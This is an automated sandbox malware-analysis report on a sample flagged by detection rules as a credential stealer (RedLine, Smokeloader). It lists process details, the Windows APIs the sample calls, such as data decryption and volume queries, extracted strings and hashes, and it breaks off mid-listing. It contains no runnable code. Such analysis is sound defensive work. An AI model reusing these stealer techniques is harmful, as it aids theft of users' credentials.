Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2561282812.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2488574681.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2561057689.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2486208016.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:53:37
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4344 -s 1820
Imagebase:	0x170000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	9.2%
Signature Coverage:	42.5%
Total number of Nodes:	153
Total number of Limit Nodes:	6

Executed Functions

Function 00437DF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 640
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
SysAllocString.OLEAUT32()\"^), ref: 004380C3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
SysAllocString.OLEAUT32()\"^), ref: 0043817E
SysAllocString.OLEAUT32()\"^), ref: 00438238
VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
VariantClear.OLEAUT32(?), ref: 004383F9
SysFreeString.OLEAUT32(?), ref: 0043841D
SysFreeString.OLEAUT32(?), ref: 00438423
SysFreeString.OLEAUT32(00000000), ref: 00438430
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,66966446,00000000,00000000,00000000,00000000), ref: 00438468

Strings

)\"^, xrefs: 004380BE, 004380C2, 0043817D, 00438237, 0043845B
P%R, xrefs: 0043804A
O@, xrefs: 0043806A
.H4J, xrefs: 0043805A
pq, xrefs: 004382E2

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: P%R$)\"^$.H4J$O@$pq
API String ID: 2573436264-1397720406
Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96

Function 00415799 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 492
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00415BAF

Strings

8MNO, xrefs: 00415C36
oA&C, xrefs: 00415CE6
~, xrefs: 0041596E
<I2K, xrefs: 00415C2B
X, xrefs: 00415DD2
NDNK, xrefs: 00415D85
RXA, xrefs: 00415842

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
API String ID: 834300711-3328159043
Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86

Function 00409580 Relevance: 9.2, Strings: 7, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PK, xrefs: 004099E1
AD2CDA090335D68DAC8923850305D13E, xrefs: 00409642
Tiec, xrefs: 00409963
r, xrefs: 004095F4
+8=>, xrefs: 00409782
#4<7, xrefs: 00409772
\, xrefs: 0040978A

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: #4<7$+8=>$AD2CDA090335D68DAC8923850305D13E$PK$Tiec$\$r
API String ID: 0-4071454177
Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46

Function 0040ACF0 Relevance: 9.2, Strings: 7, Instructions: 430
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&K M, xrefs: 0040ADBF
Jk"m, xrefs: 0040ADF7
/O_q, xrefs: 0040ADC6
e7o9, xrefs: 0040AF9F
&wXy, xrefs: 0040ADD4
h? !, xrefs: 0040AFB3
'sZu, xrefs: 0040ADCD

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
API String ID: 0-2986092683
Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85

Function 00408850 Relevance: 7.7, APIs: 5, Instructions: 194
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 0040891C
GetCurrentThreadId.KERNEL32 ref: 00408925
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004089DB
GetForegroundWindow.USER32 ref: 00408A33

Part of subcall function 0040C550: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Part of subcall function 0040B390: FreeLibrary.KERNEL32(00408AB8), ref: 0040B396
Part of subcall function 0040B390: FreeLibrary.KERNEL32 ref: 0040B3B7

ExitProcess.KERNEL32 ref: 00408AD1

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
String ID:
API String ID: 3072701918-0
Opcode ID: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction ID: 4e8ceca9db94e69365d2c2d7f1aefafb9de861df3649afd20bfce81a3928f3be
Opcode Fuzzy Hash: 80d43e03976d674c32d86d2947b6f6748d05092d2929b392bf544b78baad5a14
Instruction Fuzzy Hash: 9351A9BBF102180BD71CAEAACD463A675878BC5710F1F813E5985EB7D6EDB88C0142C9

Function 004218A0 Relevance: 3.2, Strings: 2, Instructions: 655
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!@, xrefs: 00421910
,, xrefs: 00421E6B

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: !@$,
API String ID: 0-2321553346
Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86

Function 0043C1F0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043C767 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

,+*), xrefs: 0043C790

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: ,+*)
API String ID: 0-3529585375
Opcode ID: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction ID: 95b520c28a51d7a8debe208fb8c6725e065a55489a7142fefcc330b3f2274472
Opcode Fuzzy Hash: e7fb2fe7fc15d814734d125e3abc6185c50616f6403d63d9b463f0ac7ddf630e
Instruction Fuzzy Hash: 7331A539B402119BEB18CF58CCD1BBEB7B2BB49301F249129D501B7390CB75AD018B58

Function 0040B70C Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

o`, xrefs: 0040B74B

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: o`
API String ID: 0-3993896143
Opcode ID: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction ID: 0bdba0f6bf2b5cd18ae264ba298f37260da84434396a298b3053f459174327b1
Opcode Fuzzy Hash: 62f776dcc95a1318bd9c29a2d25ade0fb881a9597666cacb70b5fb249bcdf744
Instruction Fuzzy Hash: 9C11C270218340AFC310DF65DDC1B6BBFE2DBC2204F65983DE185A72A1C675E9499719

Function 00422190 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

Function 009E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 009E024D

Strings

kernel32.dll, xrefs: 009E008F, 009E0095
cess, xrefs: 009E018D

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f5a3dc62cdc7acb52c977fcb413e7c7b233ed43874cc1a3f8a902debe43d26ff
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: A6528874A00269DFDB65CF59C984BA8BBB1BF49304F1480D9E94DAB351DB70AE84DF10

Function 009E0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,009E0223,?,?), ref: 009E0E19
SetErrorMode.KERNELBASE(00000000,?,?,009E0223,?,?), ref: 009E0E1E

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 518bfefd04ff1fa04a4c66aeaa9b8635698d5129f672d08a57038237baf20c59
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D1D0123114512877D7012A95DC09BCD7B1CDF09B62F008421FB0DD9080C7B0994046E5

Function 0043C2C8 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 0043CCAF

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction ID: 8fb46afbfb550afb85baefcd5c24b2e1a72551ea741637eac68a3138d718cba2
Opcode Fuzzy Hash: ee62edd4f90ceb3851fb76d6bb2596050db7060e58c86fce7ad8149e0838c105
Instruction Fuzzy Hash: 07F04CBAD005408BDB044B75CC821A67BA2DB5F320B18897DD441E3384C63C5807CB5D

Function 0043C180 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,0040B2E4,00000000,00000001), ref: 0043C1B2

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction ID: ec0cbf63999808cd9fde2cf832404b9ab0848eb4eaaead86bc709d6aa026588d
Opcode Fuzzy Hash: d479befdbac128fe149772a9185de956813756a2e3e272a70dac7c9e8d919251
Instruction Fuzzy Hash: 59F0E977808211EBD2003F257C01A5736649F8F735F01587AFC0152112D739D422E6AF

Function 0040C550 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C563

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction ID: e03bcfaf696d6c281ff3d22d3b8d0c31e3889364fa9117d67ae1079de8c3c82d
Opcode Fuzzy Hash: 6fc60a274ed566bab613781af0777c43ce176e621231eb36fbaf2a6aedf8035e
Instruction Fuzzy Hash: 43D0A7B557050867D2086B1DDC4BF22772C8B83B66F50423DF2A7C61D1D9506A14CA79

Function 0040C583 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C595

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction ID: 58e2b5502705141ff0d3aa7c975cc0701997441b8ab7d7d43dac110591522243
Opcode Fuzzy Hash: 49e86824338073915e330635472e4cd66e95047cd3c20be69d528b314b786c07
Instruction Fuzzy Hash: F1D0C9B47D83407AF5749B08AC17F143210A702F56F740228B363FE2E0C9E172018A0C

Function 0043AAA0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Function 0043AA80 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8

Non-executed Functions

Function 00411F90 Relevance: 105.7, Strings: 83, Instructions: 1935COMMON

Download Yara Rule

Strings

[, xrefs: 004130CF
J, xrefs: 00412736
U, xrefs: 0041309F
X, xrefs: 004136A4
Y, xrefs: 004130BF
5, xrefs: 0041270E
1, xrefs: 00412B18
1, xrefs: 00412A88
<, xrefs: 0041209B
b, xrefs: 00412B30
0, xrefs: 004134C4
L, xrefs: 004133CC
B, xrefs: 00413674
o, xrefs: 0041342C
r, xrefs: 0041332C
f, xrefs: 00412B50
[, xrefs: 004134AC
B, xrefs: 00412756
g, xrefs: 00412B58
x, xrefs: 0041333C
P, xrefs: 004136E4
o, xrefs: 00411FF4
<, xrefs: 004134A4
0, xrefs: 00413AE2
(, xrefs: 0041376C
u, xrefs: 00412726
4, xrefs: 004134E4
3, xrefs: 004126FE
8, xrefs: 00413484
_, xrefs: 004130EF
:, xrefs: 00413494
>, xrefs: 004134B4
\, xrefs: 004136C4
?, xrefs: 0041223F
{, xrefs: 0041331C
|, xrefs: 0041338C
9, xrefs: 0041272E
,, xrefs: 00412E8C
@, xrefs: 00412A58
?, xrefs: 004133BC
5, xrefs: 00412A68
b, xrefs: 0041345C
D, xrefs: 004138EA
7, xrefs: 00412E87
2, xrefs: 004134D4
`, xrefs: 00412B20
v, xrefs: 0041336C
V, xrefs: 00413714
., xrefs: 004136FC
@, xrefs: 00412706
;, xrefs: 0041273E
D, xrefs: 00413D5F
L, xrefs: 0041223A
D, xrefs: 00413684
R, xrefs: 004136F4
W, xrefs: 004130AF
?, xrefs: 0041275E
r, xrefs: 004133FC
v, xrefs: 004133DC
d, xrefs: 00412B40
@, xrefs: 00413664
q, xrefs: 0041335C
1, xrefs: 004136EC
3, xrefs: 004134DC
j, xrefs: 0041340C
/, xrefs: 00412546
N, xrefs: 00413654
f, xrefs: 0041349C
+, xrefs: 0041341C
^, xrefs: 004136D4
, xrefs: 00412766
>, xrefs: 00412424
!, xrefs: 0041276E
], xrefs: 004130DF
1, xrefs: 00412313
T, xrefs: 00413704
`, xrefs: 00412CC9
F, xrefs: 00413694
X, xrefs: 00412B60
=, xrefs: 0041274E
Z, xrefs: 004136B4
7, xrefs: 0041271E
s, xrefs: 00412716

Memory Dump Source

Source File: 00000000.00000002.2560588373.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2560588373.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IzDjbVdHha.jbxd

Similarity

API ID:
String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
API String ID: 0-561599860
Opcode ID: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
Opcode Fuzzy Hash: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57

Function 009F21F7 Relevance: 105.7, Strings: 83, Instructions: 1935COMMON

Download Yara Rule

Strings

R, xrefs: 009F395B
B, xrefs: 009F29BD
T, xrefs: 009F396B
`, xrefs: 009F2F30
D, xrefs: 009F3FC6
X, xrefs: 009F390B
0, xrefs: 009F372B
1, xrefs: 009F257A
3, xrefs: 009F2965
<, xrefs: 009F370B
_, xrefs: 009F3356
@, xrefs: 009F2CBF
[, xrefs: 009F3336
`, xrefs: 009F2D87
7, xrefs: 009F30EE
b, xrefs: 009F36C3
r, xrefs: 009F3593
8, xrefs: 009F36EB
;, xrefs: 009F29A5
j, xrefs: 009F3673
d, xrefs: 009F2DA7
>, xrefs: 009F268B
P, xrefs: 009F394B
u, xrefs: 009F298D
\, xrefs: 009F392B
V, xrefs: 009F397B
., xrefs: 009F3963
|, xrefs: 009F35F3
q, xrefs: 009F35C3
Y, xrefs: 009F3326
@, xrefs: 009F38CB
@, xrefs: 009F296D
5, xrefs: 009F2CCF
?, xrefs: 009F3623
o, xrefs: 009F225B
?, xrefs: 009F29C5
v, xrefs: 009F35D3
^, xrefs: 009F393B
D, xrefs: 009F3B51
5, xrefs: 009F2975
D, xrefs: 009F38EB
J, xrefs: 009F299D
4, xrefs: 009F374B
r, xrefs: 009F3663
1, xrefs: 009F3953
3, xrefs: 009F3743
=, xrefs: 009F29B5
s, xrefs: 009F297D
B, xrefs: 009F38DB
L, xrefs: 009F3633
/, xrefs: 009F27AD
2, xrefs: 009F373B
0, xrefs: 009F3D49
X, xrefs: 009F2DC7
W, xrefs: 009F3316
>, xrefs: 009F371B
, xrefs: 009F29CD
,, xrefs: 009F30F3
[, xrefs: 009F3713
f, xrefs: 009F2DB7
v, xrefs: 009F3643
1, xrefs: 009F2CEF
<, xrefs: 009F2302
N, xrefs: 009F38BB
:, xrefs: 009F36FB
?, xrefs: 009F24A6
], xrefs: 009F3346
7, xrefs: 009F2985
U, xrefs: 009F3306
f, xrefs: 009F3703
+, xrefs: 009F3683
9, xrefs: 009F2995
(, xrefs: 009F39D3
L, xrefs: 009F24A1
1, xrefs: 009F2D7F
F, xrefs: 009F38FB
x, xrefs: 009F35A3
{, xrefs: 009F3583
b, xrefs: 009F2D97
!, xrefs: 009F29D5
Z, xrefs: 009F391B
o, xrefs: 009F3693
g, xrefs: 009F2DBF

Memory Dump Source

Source File: 00000000.00000002.2560910348.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_IzDjbVdHha.jbxd

Yara matches

Similarity

API ID:
String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
API String ID: 0-561599860
Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
Instruction ID: 1cd22acc42fdeb3498f88cca70d2134c87efe11df84c254fbd4b10722c6cd40c
Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
Instruction Fuzzy Hash: AB13983150C7C18AD3358B3884583AFBBE1ABD6324F188E6DE5E9873C2D6798945CB53

Function 00436E74 Relevance: 44.0, Strings: 35, Instructions: 286COMMON

Download Yara Rule

Strings

\, xrefs: 00436F6A
Z, xrefs: 00436EDE
